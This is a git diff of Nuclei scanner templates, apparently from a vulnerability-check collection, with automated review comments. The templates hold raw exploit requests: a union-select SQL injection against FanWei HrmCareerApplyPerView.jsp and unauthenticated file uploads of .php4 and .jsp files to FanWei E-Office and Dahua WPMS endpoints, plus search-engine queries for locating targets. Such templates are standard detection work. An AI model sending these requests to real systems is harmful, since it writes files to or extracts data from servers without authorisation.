close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/upload/ecology_E-Office_upload.yaml b/poc/upload/ecology_E-Office_upload.yaml index 4e7ede529c..aa02a4941d 100644 --- a/poc/upload/ecology_E-Office_upload.yaml +++ b/poc/upload/ecology_E-Office_upload.yaml 
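Review bot: After this hunk poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml contains a SQL injection probe for HrmCareerApplyPerView.jsp, so the filename, the `poc/upload` directory and the unchanged context line `id: FanWei` all describe something other than the content; rename the file and give it a specific id such as `fanwei-hrmcareerapplyperview-sqli`. The new description ends with a stray hyphen (`obtain sensitive information-`). `req-condition: true` and `condition: and` are kept on a template that now sends one request with one DSL expression, where both are no-ops. The same `id: FanWei` is also kept by poc/upload/ecology_E-Office_upload.yaml in the next hunk.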
@@ -1,29 +1,52 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate - Connection: close + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close + + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryakbyiukl-- + + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' - condition: and + - body_2 == str2 + +# 
http://your-ip/attachment/回显的那串数字/a.php4
diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
index fa3aafbfe2..c7afb0444b 100644
--- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
+++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
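Review bot: The matcher `body_2 == str2` can never be satisfied as written: the multipart part for `a.php4` in the first request carries an empty body and neither `{{str1}}` nor `{{str2}}` is referenced anywhere in the raw request, so the second response has nothing to compare against and the template will never report a vulnerable host (`str1` is entirely unused). The least intrusive fix is to make the uploaded file consist of just the marker, `{{str2}}`, so it is echoed back whether or not the server interprets the file, and to relax the check to `contains(body_2, str2) && status_code_2 == 200` so a trailing newline does not defeat an exact equality. The upload leaves a persistent `.php4` under /attachment/ on the target, yet the info block declares no tags at all; add `tags: fanwei,eoffice,fileupload,intrusive` so operators can exclude it with nuclei's intrusive filter. `id: FanWei` is also shared with the sibling ecology_E-Office_Uploadify_FileUpload.yaml in this same commit; template ids must be unique, e.g. `id: fanwei-eoffice-upload-php-fileupload`.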
@@ -1,68 +1,50 @@ id: CVE-2023-3836 info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical + name: 大华-WPMS-upload-addimgico + author: hufei + severity: high description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. + 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.03083 - epss-percentile: 0.8997 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* + https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E metadata: + max-request: 1 + fofa-query: app="大华-智慧园区综合管理平台" + hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} + User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 177 + 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary + --e00b34d08d13639f8b619829b04c1a29 + Content-Disposition: form-data; name="upload"; filename="test.jsp" + Content-Type: image/gif + + {{randstr}} + --e00b34d08d13639f8b619829b04c1a29-- - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 + GET /upload/emap/society_new/{{name}} HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - extractors: - - type: regex - name: shell_filename + - type: json + name: name + json: + - ".data" internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: word + words: + - '{{randstr}}' \ No newline at end of file
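Review bot: Keeping `id: CVE-2023-3836` while dropping the classification block, the NVD/VulDB references, the `cve,cve2023,dahua,fileupload,intrusive,rce` tags and the `# digest:` line leaves a template that claims a CVE it no longer documents, loses the `intrusive` marker even though it still writes a `.jsp` file to the server, and will be treated as unsigned by engines that verify template signatures; retain at least `classification:` with `cve-id: CVE-2023-3836` / `cwe-id: CWE-434` and the original `tags:` line, or pick a non-CVE id. `max-request: 1` in the new metadata is wrong for a template that sends a POST followed by a GET (it was 2 before). The new raw request hard-codes `Content-Length: 177` although the body contains `{{randstr}}`; unless the engine recomputes the header, that value will not match the rendered body, so drop the header and let nuclei compute it. The replacement word matcher only checks that `{{randstr}}` appears somewhere in the second response with no status or part constraint; the removed DSL form `status_code_2 == 200 && contains(body_2, …)` was stricter and should be kept. Lowering severity from critical to high contradicts the CVSS 9.8 score the same hunk deletes and is not justified anywhere in the change.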